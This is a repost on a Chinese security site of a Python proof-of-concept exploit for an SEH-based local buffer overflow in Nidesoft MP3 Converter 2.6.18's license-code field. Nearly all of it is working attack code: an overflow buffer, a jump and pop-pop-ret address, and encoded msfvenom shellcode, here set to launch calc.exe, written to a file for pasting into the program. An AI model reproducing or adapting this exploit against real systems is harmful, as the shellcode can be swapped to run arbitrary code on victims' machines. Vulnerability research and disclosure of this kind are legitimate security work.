首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nidesoft MP3 Converter 2.6.18 - SEH Local Buffer Overflow
来源:vfocus.net 作者:malwrforensics 发布时间:2016-12-16  
#!python
#####################################################################################
# Exploit title: MP3 converter v 2.6.18 License code SEH exploit
# Date: 2016-12-15
# Vendor homepage: http://www.nidesoft.com/mp3-converter.html
# Download: http://www.nidesoft.com/downloads/mp3-converter.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Launch program and enter the license code in the "Register" window
#      Copy&Paste the "license" from poc.txt
#####################################################################################
 
def write_poc(fname, buffer):
    fhandle = open(fname , 'wb')
    fhandle.write(buffer)
    fhandle.close()
 
fname="poc.txt"
buf = '\x41' * 0x176c
 
###################################
#msfvenom --payload windows/exec
#cmd=calc.exe --platform windows
#-f python -e x86/alpha_mixed
##################################
shellcode =  ""
shellcode += "\x89\xe0\xda\xdc\xd9\x70\xf4\x59\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x58\x68\x4d\x52"
shellcode += "\x37\x70\x63\x30\x33\x30\x75\x30\x4b\x39\x59\x75\x45"
shellcode += "\x61\x79\x50\x70\x64\x4c\x4b\x42\x70\x36\x50\x4c\x4b"
shellcode += "\x42\x72\x66\x6c\x6e\x6b\x66\x32\x66\x74\x6c\x4b\x74"
shellcode += "\x32\x37\x58\x34\x4f\x4d\x67\x61\x5a\x45\x76\x75\x61"
shellcode += "\x69\x6f\x4e\x4c\x77\x4c\x43\x51\x63\x4c\x54\x42\x66"
shellcode += "\x4c\x75\x70\x39\x51\x48\x4f\x46\x6d\x67\x71\x4b\x77"
shellcode += "\x7a\x42\x48\x72\x63\x62\x30\x57\x6e\x6b\x51\x42\x74"
shellcode += "\x50\x4c\x4b\x61\x5a\x77\x4c\x6c\x4b\x52\x6c\x57\x61"
shellcode += "\x62\x58\x7a\x43\x53\x78\x45\x51\x68\x51\x43\x61\x4c"
shellcode += "\x4b\x72\x79\x55\x70\x56\x61\x38\x53\x4e\x6b\x67\x39"
shellcode += "\x46\x78\x5a\x43\x65\x6a\x37\x39\x4c\x4b\x36\x54\x6e"
shellcode += "\x6b\x57\x71\x7a\x76\x44\x71\x49\x6f\x6e\x4c\x6f\x31"
shellcode += "\x58\x4f\x36\x6d\x56\x61\x48\x47\x66\x58\x39\x70\x73"
shellcode += "\x45\x69\x66\x66\x63\x53\x4d\x5a\x58\x47\x4b\x53\x4d"
shellcode += "\x65\x74\x34\x35\x6d\x34\x70\x58\x6c\x4b\x61\x48\x35"
shellcode += "\x74\x53\x31\x69\x43\x65\x36\x4e\x6b\x74\x4c\x30\x4b"
shellcode += "\x4c\x4b\x46\x38\x67\x6c\x35\x51\x48\x53\x6e\x6b\x35"
shellcode += "\x54\x6e\x6b\x65\x51\x7a\x70\x4f\x79\x37\x34\x45\x74"
shellcode += "\x75\x74\x43\x6b\x33\x6b\x33\x51\x73\x69\x51\x4a\x36"
shellcode += "\x31\x6b\x4f\x39\x70\x51\x4f\x43\x6f\x73\x6a\x6e\x6b"
shellcode += "\x54\x52\x6a\x4b\x4e\x6d\x53\x6d\x51\x7a\x77\x71\x4c"
shellcode += "\x4d\x6c\x45\x4e\x52\x53\x30\x47\x70\x75\x50\x52\x70"
shellcode += "\x45\x38\x54\x71\x4e\x6b\x70\x6f\x6e\x67\x39\x6f\x58"
shellcode += "\x55\x4d\x6b\x4a\x50\x78\x35\x4d\x72\x36\x36\x43\x58"
shellcode += "\x79\x36\x7a\x35\x6f\x4d\x4d\x4d\x4b\x4f\x79\x45\x37"
shellcode += "\x4c\x77\x76\x51\x6c\x75\x5a\x6b\x30\x79\x6b\x49\x70"
shellcode += "\x62\x55\x37\x75\x6d\x6b\x61\x57\x35\x43\x74\x32\x52"
shellcode += "\x4f\x30\x6a\x55\x50\x31\x43\x4b\x4f\x69\x45\x32\x43"
shellcode += "\x43\x51\x32\x4c\x50\x63\x34\x6e\x61\x75\x62\x58\x50"
shellcode += "\x65\x67\x70\x41\x41"
 
junk = '\x41' * 0x1e
jmp = '\xeb\x20\x41\x41'
nseh = '\x37\x27\x78\x66' #pop pop ret -> avcodec.dll
buffer = buf + jmp + nseh + junk + shellcode
write_poc(fname, buffer)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Samsung Devices KNOX Extension
·Nagios < 4.2.2 - Arbitrary Cod
·Samsung Devices KNOX Extension
·Nagios < 4.2.4 - Privilege Esc
·McAfee Virus Scan Enterprise f
·Microsoft Internet Explorer 9
·Microsoft Internet Explorer 9
·Microsoft Internet Explorer 9
·Serva 3.0.0 HTTP Server - Deni
·Microsoft Internet Explorer 9
·10-Strike Network File Search
·Edge SkateShop Blind SQL Injec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved